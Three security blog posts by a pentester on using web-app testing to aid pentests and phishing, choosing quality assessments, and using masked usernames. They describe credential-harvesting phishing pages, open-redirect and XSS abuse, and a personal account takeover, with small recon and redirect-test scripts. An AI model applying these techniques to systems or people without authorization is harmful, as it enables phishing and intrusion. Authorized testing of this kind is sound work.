June 25, 2019

One-Two Punch: Using AppSec to Up Your Pentests and Phishing Gigs

Let's Get Ready to Rumble!

In this corner we have the reigning InfoSec champion of the world, penetration testing.  Pentesting is no stranger in the cybersecurity space.  In the other corner, the popular challenger: dynamic application security testing.  These are not the same, but have you considered using AppSec to enhance your existing penetration testing and phishing engagements?  Instead of viewing these consulting services as distinct, isolated components, AppSec can be a great multiplier when teamed up with pentesting/red teaming and phishing.  The result is a more comprehensive, holistic view of the environment, which can lead to better results in the other red team activities.

I'm writing this blog because it's not always obvious to pentesters, and I often find critical web vulnerabilities that were missed by other teams.  AppSec seems to be the path less traveled, especially when the engagement isn't sold specifically as a static or dynamic application security gig.  The client is expecting that punch to the head: the vulnerability scan and the Man-in-the-Middle attack.  They're not expecting that left hook: the external command injection vulnerability on their HR server.  It can be the difference between a technical knockout (TKO) and a full knockout (KO) report for the client.  Just ask King Hippo.

Round 1: Penetration Testing & Red Team (Physical)

Fortunately for you, dear reader, I decided not to go into full-on story mode with this blog.  I'll cite some examples at a high level that I've experienced personally, but for the most part I'll keep it short and simple.  There have been multiple instances, while doing either penetration testing or red team activities, where AppSec made the difference between a successful engagement and a so-so one.  You might be thinking, "Well, my vulnerability scanner supports application testing."  True, but they typically aren't very comprehensive.  Sorry, they just aren't.  (Looking at you, Tenable!)

Traditional Penetration Testing

The issues below are just some examples of web findings I've come across that aided my penetration tests in the past:

  • SQL Injection (SQLi)
  • Local File Include (LFI)
  • Server Side Request Forgery (SSRF)
  • Unrestricted File Uploads (Web Shells, Hashes, etc.)
  • Misconfigured Web Services / Information Disclosure (Directory Listing, Verbose Error Messages, etc.)

I was once doing a pentest for a new client who was big on rotating their security vendors annually.  Although I support having a fresh set of eyes on your environment each time, I think there's also value in security professionals knowing your network and business.  As a manager, I strongly believed in rotating the lead internally for each recurring engagement.  I digress...

This particular environment was somewhat mature from a security perspective and had regular vulnerability scanning and penetration testing performed on its external perimeter.  Not surprisingly, I wasn't able to find anything worthwhile to leverage in order to gain access to the internal environment, and my go-to (phishing) wasn't in scope.  Instead, I used the leftover time I had available to do some application security testing in Burp Suite Professional.  Using my nmap/Nessus host and service discovery results, I sucked the web services into Burp's sitemap and started testing.  It wasn't long until I found unauthenticated SQL injection with os-shell access.  The service was running as an elevated account, so from there it was an easy win from an internal testing perspective.
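For anyone who wants to script that hand-off from discovery into Burp, here's a rough sketch (standard library only) of pulling likely web services out of a .nessus export.  The element and attribute names follow the usual NessusClientData_v2 layout, and the web-port heuristics are my own guesses, so adjust both for your scans.

```python
import xml.etree.ElementTree as ET

# Service names and ports that usually indicate something worth browsing.
# These are heuristics, not an exhaustive list.
WEB_SVC_NAMES = {"www", "http", "https", "http-alt", "https-alt"}
WEB_PORTS = {80, 443, 8000, 8080, 8443}

def web_services(nessus_xml: str):
    """Return sorted (host, port, scheme) tuples for likely web services
    found in a .nessus (NessusClientData_v2) export."""
    root = ET.fromstring(nessus_xml)
    found = set()
    for host in root.iter("ReportHost"):
        name = host.get("name")
        for item in host.iter("ReportItem"):
            svc = item.get("svc_name", "")
            port = int(item.get("port", "0"))
            if svc in WEB_SVC_NAMES or port in WEB_PORTS:
                scheme = "https" if "https" in svc or port in (443, 8443) else "http"
                found.add((name, port, scheme))
    return sorted(found)
```

Each tuple becomes a scheme://host:port target you can paste into Burp's scope or feed to a spider.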

Had the web applications been tested by the prior security firm, this wouldn't have happened and I would likely have struggled to find any worthwhile results during the engagement.  I've seen the same thing with LFI for gaining access to credentials, SSRF for accessing sensitive internal systems that aren't exposed publicly, unrestricted file uploads leading to web shells and NTLMv2 hash leaks, and misconfigured web services resulting in sensitive information disclosure by means of directory listings and verbose error messages.  I've also seen directory listings that exposed SQL backup files and .htaccess files with credentials or hashes in them.  I'm sure I'm not alone here...

Red Team / Physical Penetration Testing / Physical Social Engineering

These engagements can be really fun.  Typically there's a lot of recon and planning that goes on prior to an on-site activity.  Here are just a few of the things I've seen exposed via web applications that could come in really handy during a red team engagement:

  • Physical Access Control Systems (Default or Weak Credentials, Auth Bypass, etc.)
  • Access and Control of Camera / Security Systems
  • Access Codes for Doors / Badges
  • Building and Cubicle Diagrams

As you can imagine, having someone on your team who can give you access to the facilities while you're physically on-site doing a red team can come in really handy.  A remote teammate, or even you yourself with an Internet-connected device, could remotely open garage doors, unlock interior doors, and disable the cameras to go undetected, Mission Impossible style!  I've accessed building codes and cubicle layouts just from unauthenticated directory listing vulns on publicly facing web servers before!


Here are a few of my favorite tools for quickly surfacing web services and content during these engagements:

  • HTTP_Screenshot (SpiderLabs)
This is an oldie but a goodie.  If you can get past the dependencies (PhantomJS, etc.) and install it successfully, it's worth it.  It's an Nmap NSE script, so you can run it during host and service enumeration to get a separate PNG image for each web service, rendered from the perspective of a browser.  I always use this on penetration tests so I can quickly scan through the web services and decide whether there's a web portal I want to target manually.  It's especially useful when your target is a web development or hosting company and there are a good number of web services in the environment.
  • Burp Importer
I love this one.  On my team we use Nessus as one of many tools in our arsenal, but we leverage it mostly for host and service discovery.  The .nessus file you can export is really just XML under the hood.  This Burp Suite Professional extension imports all relevant web services by IP and port into the Burp sitemap from the Nessus output, which makes adding them to your Target scope and spidering/scanning quick and convenient.
  • DirBuster / Burp Content Discovery
Because most web services are detected by IP address and port, the default web path may not be known.  Instead, you may get a default IIS/Apache landing page or a 403 Forbidden response.  Even if you do get a valid page, it's possible there are other "hidden" paths or files in the web directory that shouldn't be accessible, so a tool like Burp's Content Discovery or OWASP's DirBuster is a great way to find what others may have missed.
  • WPScan
This is true for any Content Management System (CMS), but WordPress especially is a goldmine for security issues, typically due to a lack of patching of libraries, themes, and plugins.  WPScan is an excellent tool for quickly identifying the version and the vulnerable components, as well as enumerating and brute-forcing user accounts.
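To make the content discovery idea concrete, here's a toy, DirBuster-style sketch: cross a wordlist with a handful of extensions, request each candidate, and keep anything that doesn't come back as a 404 (a 403 still tells you the path exists).  The wordlist and extensions here are purely illustrative; a real run would use a curated list.

```python
import urllib.request
import urllib.error
from itertools import product

def candidates(base, words, exts=("", ".php", ".bak", ".zip")):
    """Build candidate URLs: every wordlist entry crossed with every extension."""
    base = base.rstrip("/")
    return [f"{base}/{w}{e}" for w, e in product(words, exts)]

def probe(urls, timeout=5):
    """Request each URL and return {url: status} for non-404 responses."""
    hits = {}
    for url in urls:
        try:
            with urllib.request.urlopen(url, timeout=timeout) as resp:
                hits[url] = resp.status
        except urllib.error.HTTPError as err:
            if err.code != 404:   # 401/403/500 still reveal the path exists
                hits[url] = err.code
        except (urllib.error.URLError, OSError):
            pass                  # unreachable host; skip quietly
    return hits
```

Only run the probing half against systems you're authorized to test, of course.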

Round 2: Phishing

I never do phishing without doing some AppSec up front.  It's come in handy more times than I can count.  Most AppSec vulnerabilities that are useful for phishing involve being able to host content in the target's own environment so that URLs can be crafted to look like they originate from the legitimate domain.  Here are the ones I'm specifically looking for:
  • Open Redirects
Open Redirect vulnerabilities (via GET requests) allow an attacker to craft a URL that originates from the target domain but redirects, via a 302 response, to a third-party domain of their choosing.  This technique is used by real-world attackers often, and for good reason: it's very difficult for a user, even one with security awareness training, to spot the fake request since they recognize the domain.  This technique, and the ones below, often sail right past web content filters and spam filters as well.  Attackers can even obfuscate the redirect parameter at the end of the URI with URL encoding, making it that much more difficult to spot as a fake.
  • Unrestricted File Upload + Insecure Direct Object Reference (IDOR)
During a penetration test for a large university, I leveraged a combination attack against the school's student printing services, which had an unrestricted file upload vulnerability.  I was able to bypass the client-side content-type filters to upload an HTML file instead of a DOCX file.  In addition to this, they had Insecure Direct Object Reference issues, and it was trivial for me to locate and craft a URL to access my uploaded HTML file.  Compounding the issue further was the fact that no authentication was required, so what I now had was my own page hosted on the .edu domain, which is otherwise difficult to spoof since .edu registration is off-limits to the general public.  As you can imagine, it was easy from there to set up a fake login form that posted credentials to my own third-party site and then redirected the unknowing victim on to the legitimate post-authentication resource.
  • Cross Site Scripting (XSS)
Cross Site Scripting vulnerabilities are yet another way to control the content hosted on the phishing recipient's own domain.  By injecting HTML into the page by means of XSS, it is possible to alter the content of forms.  Additionally, if the X-Frame-Options security header is missing from the web service's configuration, it's possible to inject a full-page iframe and completely redesign the vulnerable target site, hosting your own content.  Whether the XSS is stored or reflected, you can craft a URL to your page and email the link to your victim.
  • Remote File Include (RFI)
RFI vulnerabilities are ways to include, or reference, external resources.  Sometimes this is JavaScript, server-side script pages, or just a static HTML page.  RFI is another example of potential content modification, making it possible to craft a URL that originates from the legitimate victim's domain but actually pulls content from an attacker-controlled server.
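Circling back to the open redirect case above, the two pieces worth automating are small enough to sketch here: crafting a candidate URL (the `url` parameter name is just a common guess; the real parameter is app-specific) and deciding whether a Location header actually leaves the trusted domain.

```python
from urllib.parse import urlparse, urlencode

def redirect_test_url(base, param="url", target="https://attacker.example"):
    """Craft a URL that, if the endpoint is vulnerable, 302s off-domain.
    'url' is only a common parameter name; substitute the app's own."""
    sep = "&" if "?" in base else "?"
    return base + sep + urlencode({param: target})

def is_external_redirect(trusted_host, location):
    """True if a Location header points outside the trusted host.
    Relative redirects (no host component) stay on-site."""
    host = urlparse(location).hostname
    return host is not None and host.lower() != trusted_host.lower()
```

Note that `is_external_redirect` also catches protocol-relative payloads like `//attacker.example/x`, since `urlparse` still extracts a hostname from them.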

DING DING!  And Our Winner Is...

Hopefully this blog serves to help those who don't typically take an in-depth look at web applications during phishing or penetration testing activities.  If you already do this, great!  Keep it up!  I likely missed some examples and vulnerabilities that can be used in this manner, so please let me know if you have something to add so we can all improve. 😃  Dynamic Application Security Testing can stand on its own as an excellent service, but it's unique in that it can also serve as a teammate to these other services, much like Mickey is to Rocky.  Until next time!  (Cue Eye of the Tiger Music)

- Curtis Brazzell

June 06, 2019

Not Just a Vuln Scan - Are You Receiving/Providing Quality Security Assessments?


Having a diverse background in Information Security has given me what I think is a unique perspective on both the receiving end and the giving end of technical security assessments.  In sales support roles, I'm always trying to get to the bottom of what it is, exactly, that our customer most needs.  There's something really rewarding about translating technical jargon and bridging the gap between sales teams and executive-level decision makers.  It may sound cliché to say, but I honest-to-goodness have a passion for helping people find the most value in these assessments and walk away more secure than they were before engaging with our team.

Similarly, it really irks me to my core when I come across a statement of work, or the results of a previous assessment, that was performed in a way that does not maximize the effectiveness of said assessment.  With so many technical service offerings available and so many different organizations providing these services, it's hard to fault the customer, or even the salesperson, who may simply struggle to understand them fully.  Perhaps there's a limited budget available and services weren't properly prioritized.  This is why it's so important to have a technical resource available during the beginning phases of sales conversations, even though most of us in this field just like to focus on delivery.  Today, just about everyone offers a penetration test, but testing methodologies are not always standardized and sadly, some aren't even a pentest by definition!

In this blog I hope to lay out some ways in which as a customer you can help ensure you're getting a quality assessment.  If you're a technical resource, I also hope to help outline ways in which you can make sure you're offering the right assessment and delivering consistent, actionable results which are valuable to your customer.

Some Definitions

Since I mentioned penetration testing, let's go there.  A question I often get, as I imagine most of you readers do as well, is, "What is the difference between a penetration test and a vulnerability scan?"  Don't feel bad asking this if you don't know because, sadly, many sales and technical people offering these services don't seem to know either.  There's also red teaming.  It's important to know what you're getting for your money, but it's even more critical when dealing with PCI, because a vulnerability scan won't fulfill the council's requirements and could leave you failing compliance.

I'm probably going to over-simplify this definition for many, but simply put, a vulnerability scan is a passive or active scan of hosts and services to identify vulnerabilities and their severity, impact, and risk to the organization.  There is a lot of value in a vulnerability scan, as it helps you proactively identify and resolve potential patching deficiencies and configuration issues before an attacker does.  It also complements your patch management process by ensuring patches aren't being missed.  However, this by itself is not a pentest.

A traditional network penetration test (pentest) is the act of exploiting or validating these vulnerabilities with the intent to demonstrate the impact to the organization.  Other tools and techniques can be used to simulate what an attacker may do, going further than just a single scan.  It's worth noting that both vulnerability scans and penetration tests may or may not include web applications.  Some focus on web applications specifically, often referred to as a "Web Application Pentest" or an "Application Security Test".

Lastly, a red team is essentially a penetration test, but with the intent of simulating an attacker targeting the environment directly.  This is often done in an opsec-friendly way to "stay under the radar" and avoid detection by defensive teams and technologies.  There's also more reconnaissance up front, since the scope and access to the environment aren't likely to be provided by the customer.


Now we should all know at a high level what the differences are between these services.  However, you'll see that not all pentests are created equal.  If you're looking at penetration testing quotes, keep in mind that you're most likely not comparing apples to apples, so going with the most affordable doesn't necessarily mean it will satisfy all of your requirements.  Now, if you're looking to "check a box" to meet regulatory compliance requirements or to satisfy your customer requests, you may be okay with a basic "out of the box" assessment.  Keep in mind that there are firms (I've seen the service contracts) that offer a vulnerability assessment but call it a penetration test, I can only assume in order to offer competitive pricing.  If you come across one of them, please point them to this blog. 😉


Something I came across recently was an outsourced pentest that had already been sold.  It's not uncommon to find a limited scope, with the intent to sample assets in the environment due to budget or time constraints.  I have my own opinion about sampling when it comes to penetration testing (don't do it!).  Essentially, an attacker will often find the easiest path in, the weakest link.  If you miss it because you didn't look at everything at least once, you're not doing yourself any favors.  This particular SOW stated that about 5% of the environment would be tested every quarter, for a year.  This included vulnerability scans as well, with the same scope.

I understand wanting to limit the cost, but in this situation it would be better to take that same investment and put it towards a vulnerability scan for the ENTIRE environment, then focus the penetration testing on critical assets and the highest severity findings from the vulnerability assessment.  If it can only be done twice a year for the pentest, that's better than four very limited tests.  The way this was set up, they'll never have a complete picture of their environment at any one point in time.  Had I been involved from the beginning or this was Pondurance offering the service, I would have made these suggestions to the customer in a pre-sales conversation.

Frequency of Testing

I just touched on it in the last paragraph, but the frequency of testing can play a role in the thoroughness and efficiency of an assessment.  It is commonly recommended to perform a penetration test about twice a year.  This is due to the dynamic nature of enterprise environments and the frequency with which security vulnerabilities are introduced into any system.  How much is too much, though?  I'd rather see a comprehensive penetration test once a year than two or even four "budget" pentests.  Attackers are financially motivated, and if targeting a specific organization, time is often not a constraint for them.  For consultants, on the other hand, it is.  A good penetration tester will make the best use of their time, manually digging and looking for unique opportunities to move laterally and compromise credentials and hosts along the way.

If you decide you do want frequent tests, make sure you're not being over-charged either.  The first assessment should have more time allocated to it, with subsequent ones benefiting from the familiarity and experience gained with the environment.

Maturity / Security Posture

Another common gotcha I see is when a customer or the sales person tries to put the proverbial cart before the horse.  You can't run before you can walk.. I'll spare you the rest. 😃  Sometimes I wonder what my own sales team thinks when I'm in a scoping meeting and I'm actively reducing the scope of our services.  Fortunately, my team at Pondurance is as passionate as I am about helping our customers so they've always been cool (at least in person!) about my stepping in and altering course.  Many customers bring this on themselves, assuming the best place to start in their security journey is to go all out and do a red team assessment.  

I often offer a lower-cost but more effective first step, such as a security architecture review (gap analysis) or perhaps a vulnerability management program.  Similarly, we offer a penetration test with every vulnerability management program offering.  Many customers initially want the pentest first, followed by monthly external scans and quarterly internal scans.  I always push back on this and instead suggest we do the pentest at the end of the engagement.  What value is there in an easy pentest, demonstrating the environment is full of holes?  It's like shooting fish in a barrel, an easy win for the tester.  Wouldn't there be so much more value in waiting a year while the customer receives their scan results and works on remediation throughout that time?  Then, when they feel they've done everything they can to protect themselves, we test that defense by simulating a real-world attack.

Things to Look For

Pre-Engagement Red Flags

One of the earliest indicators when assessing a new partner for security assessments is the questionnaire.  This is the document, or form, that the sales representative uses to help scope the engagement appropriately.  This document should be pretty telling about how and where they place their emphasis on time.  While it's true that the number of IP addresses or URLs helps provide a baseline estimate for how much time an assessment may take, there should be follow-up qualifying questions to gain more context around those.  How are those accessible?  Does a /24 subnet REALLY have all 254 usable IP addresses in use, or are you paying too much when there are just a handful of hosts within it?
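The subnet math is worth sanity-checking yourself when reviewing a quote; a /24 has 256 addresses, minus the network and broadcast addresses:

```python
import ipaddress

def usable_hosts(cidr: str) -> int:
    """Usable IPv4 host addresses in a subnet (excludes network/broadcast)."""
    net = ipaddress.ip_network(cidr, strict=False)
    return max(net.num_addresses - 2, 0)

print(usable_hosts("10.0.0.0/24"))   # 254
print(usable_hosts("10.0.0.0/28"))   # 14
```

Keep in mind 254 is only the ceiling for that /24, not the count of hosts actually in use, which is exactly why the qualifying questions matter.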

Are they simply quoting you for everything you ask for or are they wanting to discuss what your end goals are with you in order to better serve your needs?  This also shouldn't be a meeting to throw more stuff at you, but rather a conversation about the bigger picture to ensure the right services can be offered.  This can result in a reduction in scope, as I mentioned above.  If it's right for the customer, it should be right for the firm.

Ask about testing methodologies and frameworks.  Does their testing include manual testing?  Are they following a standard process such as the Penetration Testing Execution Standard (PTES)?  Is there a Quality Assurance component for both the technical work and the deliverable?  What does the deliverable look like?  Can you see a redacted version?  Are their reports actionable, with clear recommendations, and not just a regurgitation of every issue the scanner found?

Lastly, and probably most obvious, is the Statement of Work (SOW).  Does this contract clearly define the testing process and expected deliverable formats?  Does it specify the project management component?  Exactly how much time is dedicated to manual testing vs. automated scanning?  Are they charging time for tools to run?  Are compliance tests called out with their specific requirements?  Is retesting something you're expecting, and is it a separate line item?  What are their data retention periods?  There have been some big security vendors in the news recently for breaches that resulted in sensitive client data being exposed.  *cough* Hacking Team *cough*

Engagement Red Flags

Once the engagement is sold and there's a kickoff meeting to discuss expectations around timing, the testing process, and delivery, do you discuss these things in detail?  Are the rules of engagement specifically called out and discussed in depth?  

Something I've found from my experience as a Systems Administrator on the receiving end of a penetration test is that you may have certain expectations for findings.  For example, I was at an organization where we had certain service accounts we knew needed to be transitioned, as well as some unsupported operating systems we had scheduled to retire.  I specifically looked for these results in the penetration test report as a quick sanity check to make sure they were at least finding the low-hanging fruit.

Ironically, as a tester I'm always concerned the client is doing the same to me, and they should!  It's a great way to check my work, and it's a challenge to make sure I try to find everything I can.  No pentester can ever find everything, but again, the low-hanging fruit should be discovered and exploited if possible.  I wonder how many of our customers have had honeypots and I just didn't know it. 😅  Although this could be seen as a waste of time, it's yet another way to measure the effectiveness of your red team.  I've also been pitted against a blue team SOC and blacklisting security devices, which made me think really carefully about how I was going to do my passive information gathering and fly under the radar.  Now we get into purple team operations, where we can test the effectiveness of both teams and use the results as a training opportunity for each!

Post-Engagement Red Flags for Future Consideration

It may be difficult to determine the quality of the test based on the results alone.  After all, clients aren't typically as technical in the same areas as the company providing the testing services.  However, the quality of the report should be obvious.  Do they do a good job of breaking down the main issues in a prioritized, easy-to-understand executive summary?  Does the report also give enough technical detail so that the responding IT department can resolve the issues being addressed?

Does their deliverable contain screenshots as evidence of the exploited vulnerabilities, and are they effective in demonstrating the risk posed by them?  Are there other supporting data files from tool outputs, such as vulnerability scan dumps, tool state files, and raw stdout?  Are they willing to share a list of all of the tools that were used during the assessment?  Part of the value in the assessment may be the education around tools and processes, which can be used in internal training.  A big part of what I do in Dynamic Application Security Assessments is to provide Burp Suite Professional project state files so that the developers can load the findings into their own tools, replay the payloads, and verify for themselves that the findings were resolved.  I've even had the sales team in some instances add an ad-hoc training opportunity for an entire team, tacked on to the end of the review meetings.

Speaking of review meetings, this, in my opinion, is the most valuable part of the engagement for the customer.  It should be offered a week or two after the results are provided, to allow time for the customer to digest them and form questions.  Are they conducting these as personally as possible?  These should be done face to face, when feasible, in an open-floor presentation style to allow for healthy back-and-forth dialogue.  It's an opportunity to really utilize those advisory resources the consultancy has to offer by asking questions and making sure everyone's on the same page in regards to remediation, etc.  Lastly, is the project closed immediately after the review meeting and the invoice is paid, or do they offer to answer lingering questions afterwards?  I always offer this personally, even knowing there may not be budgeted time to charge to, because I see the value in helping customers who, in all likelihood, won't get around to resolving the huge list of issues you dumped into their laps until after the project is finished.


This is by no means a comprehensive list of things to do and look for when shopping for or offering security services.  These are just a few things I see regularly, and since I have a passion for making sure people get the most "bang for their buck", I wanted to share them with the community as well.  I think we can all do a better job, as the technical delivery and sales teams, of meeting our customers' needs, and I strongly believe developing that quality reputation goes a long way toward the overall success of the business.  A lot of that comes down to communication up front, and not assuming our customers know what's best for themselves.  We need to listen to them if they want something specific, but they're also hiring us to be their trusted advisors.

Please share any other thoughts and ideas!  I'd love to hear how people are testing their testers.  😄

- Curtis Brazzell

May 01, 2019

OSINT Recon Great? - Unique Usernames Are Better Than Unique Passwords

Using Blur to Create Unique Emails/Usernames


Happy World Password Day! Yes, this is an opinion piece. No, I’m not saying passwords are unimportant. The title is meant to be bold to encourage debate and to bring awareness to the topic. If anything, I believe they’re equally important as passwords when it comes to privacy and security. This is something I’ve been practicing personally now for ten years and it has worked well for me. Please hear me out and wait to tell me how wrong I am until after you’ve read the entire article. 😛 Passwords have been over-talked in the information security space to, quite literally, the brink of extinction. We still have to live in a world where credentials are the primary form of authentication online, for now. Big steps are being taken to get rid of the need for passwords but they’re here to stay for a while. Sorry passwords, I know today is your day.

Credentials are typically made up of an email address or username, a password, and ideally another form of identification such as a security token or push notification, known as Two-Factor Authentication (2FA).  So why then are we always talking about passwords and 2FA?  We almost never talk about usernames, and in my opinion they're just as important in a security context, if not more so, than their notorious counterpart.  They're like the R2-D2 of authentication when C-3PO always gets the gold!  (Auth-2D2)

Please understand me: I'm certainly not advocating we use weak passwords, just that the importance of usernames is often overlooked.

R2 Authenticating Into Jabba's Palace

Now that your eyes have returned to their normal, non-rolled position, let's talk about why I feel this way.  Hint: It's OSINT


I've previously spoken about Open-Source Intelligence (OSINT) tools and the reconnaissance phase in my phishing article, so I'll do my best to avoid any redundancies here.  A lot of those tools are designed to target a company or a domain first and then find information on the individuals associated with it.  However, sometimes an attacker may be targeting an individual instead of an organization from the start.  Popular targets in the real world are usually victims who have personal connections to the attacker or are high-profile people such as celebrities or politicians.  The technical goal of the attacker may be to gain unauthorized access to resources as that individual, or to violate their privacy by discovering browsing habits and sites they belong to.  The end goal could be to humiliate and expose their victim or to financially profit from this access.  I'll admit, in my past I had to put the grey hat back on and dig up a LinkedIn breach hash, crack it, and use Facebook SSO to get into other accounts in order to geo-locate an IP address for someone in the family who had gone missing.  We were concerned for their safety, truly.

By now, just about everyone who uses the Internet knows that strong passwords are a better idea than using "123456" for their Chase account's password.  This has been a long, brutal lesson, and some people are still getting caught up to speed.  A newer, but still relatively old, concept in security is to use unique passwords that are different for each site you have an account on.  This is great, as long as it's done properly.  Using a password manager instead of 20 post-it notes on your desk is the preferred way to do this, in case you were wondering.  (I, like many others before me, have seen this in physical penetration testing engagements!)  If this is you, convert them to a password vault like KeePass, 1Password, or LastPass, then crumple them up and throw them in the shredder.  For the rest of you, great job on keeping your passwords safe and unique!

Great!  Now that all of us have a different set of credentials on every site we belong to, let's talk about why it's important to do this.  I'll keep it brief because it's not a new concept, but I feel it's worth explaining due to the importance of the topic.  "Credential Stuffing" is a term used when an attacker gains access to a list of usernames and passwords, typically through a breach leak, and attempts to match them up against other sites and services to see if people are reusing passwords.  Not us!  However, many people do, and these attackers have tools such as Snipr which can pretty quickly and effectively check which other sites those credentials work on.  Sites such as haveibeenpwned.com allow users to check, and even be alerted, in the event that their accounts have been compromised.  If someone is targeting you specifically, the same technique applies, except they won't be spraying a breach list hoping for any account to let them in; they'll be using your leaked password directly against you.
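Speaking of haveibeenpwned.com, its Pwned Passwords range API is built so you never send the full password, or even its full hash: only the first five characters of the SHA-1 leave your machine (the k-anonymity model), and the suffix is matched locally.  A minimal client sketch:

```python
import hashlib
import urllib.request

def sha1_prefix_suffix(password: str):
    """Split the uppercase SHA-1 hex digest into the 5-char prefix sent to
    the API and the 35-char suffix that is only ever compared locally."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return digest[:5], digest[5:]

def pwned_count(password: str) -> int:
    """Return how many times a password appears in the HIBP corpus (0 if none).
    Only the 5-character hash prefix is ever transmitted."""
    prefix, suffix = sha1_prefix_suffix(password)
    url = f"https://api.pwnedpasswords.com/range/{prefix}"
    with urllib.request.urlopen(url, timeout=10) as resp:
        for line in resp.read().decode().splitlines():
            candidate, _, count = line.partition(":")
            if candidate == suffix:
                return int(count)
    return 0
```

The range endpoint returns hundreds of suffix:count pairs per prefix, which is what makes the lookup privacy-preserving: the server can't tell which suffix you were after.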

HIBP Breach Leak Lookup by Email

Someone using a credential stuffing tool or a number of OSINT tools can still learn a lot about you if they're trying to build an online profile of their target.  Think about it: your email address or username is likely the same on every website you're registered with.  After all, the username just identifies you.  It's your password that verifies your authenticity, or is supposed to, and says you are who you say you are.  Would you care if all of the sites you're registered on were publicly searchable by anyone who wanted to look into your life?  People could build a pretty good profile of you: whether you go to church, where you bank, what hobbies you have, groups you belong to, social media accounts, and so on.  Maybe you don't want all of that out there?  The Internet is not forgiving, after all; it archives a mind-boggling amount and has an almost infinite retention period.  Just Google your email address and see what pops up, and that's only what a non-attacker would use to dive into your story.  The Ashley Madison scandal comes to mind, along with the people who were "outed" because they didn't expect a security breach to give them away.  Having complex passwords didn't help them.  It's not that I'm condoning that service, but I believe in privacy for all.  Why not create "throwaways" for every site you belong to?

Usernames and email addresses aren't necessarily synonymous.  Maybe I want my username to be publicly known for a social media account.  For example, my Twitter username is @CurtBraz.  Anyone can know that, and I don't want to mask my identity there; that's a risk I choose to accept.  However, I still log in with a uniquely masked email address in addition to a strong, unique password.  If someone wants to brute force my password they would also need to know my email address, which shouldn't be accessible in most cases.  And even if they somehow obtained that masked address and wanted into my email account, they'd still have no idea what my underlying real email is.

Even if my password were reused everywhere, an attacker would still run into the same problem.  Staring at a breach list of credentials, you might have my password for Twitter, but you couldn't use it anywhere else I have an account, because you wouldn't know which accounts are mine.  This is the point I hope to make.

Snipr Config Hits

Recommendations and Conclusion

So what can we do to protect our privacy?  Something we always preach from an application security perspective is that sites should not disclose whether a username exists when a password is incorrect or a reset request is initiated.  Instead, they should respond with a generic message like, "This username or password combination does not match any known records."  That being said, a lot of popular sites don't follow this practice.  Captcha isn't foolproof, but it's another deterrent against bots or scripts attempting to automate these attacks.  For any developers or site administrators reading this, you can help your users by following these simple practices.  Also keep in mind that content from forums and discussion threads is spidered and indexed by search engines, which can expose usernames this way as well.
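To make the idea concrete, here's a minimal sketch of a login check that behaves identically for an unknown username and a wrong password.  The helper names and PBKDF2 parameters are illustrative, not any particular site's implementation:

```python
import hashlib, hmac, secrets

GENERIC_ERROR = "This username or password combination does not match any known records."

def make_record(password):
    """Salt and hash a password for storage (PBKDF2, stdlib only)."""
    salt = secrets.token_bytes(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def verify_login(users, username, password):
    """users maps username -> (salt, hash).  Returns (ok, message).  A dummy
    record is hashed even for unknown usernames, so both the response text
    and the amount of work done look the same whether the username or the
    password was wrong -- no username enumeration."""
    salt, stored = users.get(username, (b"\x00" * 16, b"\x00" * 32))
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    if username in users and hmac.compare_digest(candidate, stored):
        return True, "Welcome back!"
    return False, GENERIC_ERROR
```

The dummy-record trick matters because an attacker can enumerate usernames from response timing alone, not just from the error text.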

This advice is for everyone else who's a "user".  Consider using unique, unidentifiable usernames and email addresses when registering online.  Some people take it even further, depending on their privacy needs, and "mask" other information such as credit cards, names, and physical addresses.  For the purpose of this blog I'm only referring to usernames and emails.  Even if your password is disclosed in a breach and you are an avid password reuser, no one will know which account is yours to try the password against.  Of course, they could still run a dictionary attack and force their way in eventually, which is why it's good to follow both practices.  Also, a unique email or username, as opposed to only a unique password, makes it extremely difficult to identify you as having an account on a given site.  If I were to take your one known email address and run it through an OSINT tool, I would only find that one site you belong to.  I wouldn't get a pretty visual map like I do in Maltego showing what other services I can try my leaked credentials against.

Maltego Example of User Recon

I personally use a browser plugin called "Blur" (formerly known as DoNotTrackMe) which does an awesome job of integrating into Chrome form fields and offering to "mask my email".  See the image at the top of this article for an example of creating a new account on AWS.  I use the same format for usernames.  I then leverage KeePass for unique passwords, but you can use any password manager you like, even Blur or your browser itself.  Most password managers will reference the HIBP API to make sure your passwords themselves haven't appeared in a breach.  This lets me quickly and easily create throwaway emails I can use for authentication while protecting my real address.  As a plus, it can effectively cut off unwanted spam by turning off the forwarding service and blocking trackers.  There are other services you can use for disposable email address and username generation, such as Guerrilla Mail.  Even Gmail allows you to create email aliases by simply adding a plus sign: if your email address is curtis.brazzell@gmail.com, you can create one on-the-fly at a cash register, such as curtis.brazzell+gamestop@gmail.com, and your mail will still be delivered.  What you've effectively done is create a unique account name that attackers won't easily recognize as yours in a breach list, but which is still recognizable to you.  You can also tell which sources are sharing your address with third parties this way!  Of course, someone could figure out your naming convention, so you may want something more random.
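As a toy illustration of the plus-sign trick, here's a small helper (entirely my own naming, not part of Gmail or any real tool) that builds per-site aliases, with an option to randomize the tag so one leaked alias doesn't reveal the convention:

```python
import secrets

def plus_alias(mailbox, site, randomize=False):
    """Build a Gmail-style plus-addressed alias, e.g.
    curtis.brazzell+gamestop@gmail.com.  With randomize=True a random
    hex tag is appended so the naming scheme can't be guessed from a
    single breached alias."""
    local, _, domain = mailbox.partition("@")
    tag = "".join(c for c in site.lower() if c.isalnum())
    if randomize:
        tag += "." + secrets.token_hex(4)
    return f"{local}+{tag}@{domain}"
```

One caveat worth knowing: plus addressing is trivial for a spammer (or credential stuffer) to strip, which is why a fully masked address from a service like Blur or Guerrilla Mail is the stronger option.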

My KeePass Database 
(Now I'll Have to Change it Again) 😋

Guerrilla Mail Disposable Emails 
(Shark Lasers is a Freaking Awesome Domain, BTW)

Blocked Blur Email

With the advent of open and centralized authentication services like OAuth and Auth0, things are changing a bit.  There's still a balance in my mind for using these services.  On one hand, all of your memberships are tied to one or a few providers (Facebook, Twitter, Google, etc.), and as long as that account is secure, your others should be as well.  Registering this way is one less username and password to deal with.  On the other hand, you're putting all of your eggs in one basket when you think about account takeover, and you're using the same username everywhere.  There's always the potential that the provider itself could be breached, even Google!  My personal approach is to mix it up: I use Single Sign-On (SSO) for less important resources, and for more private ones I register directly with the site.

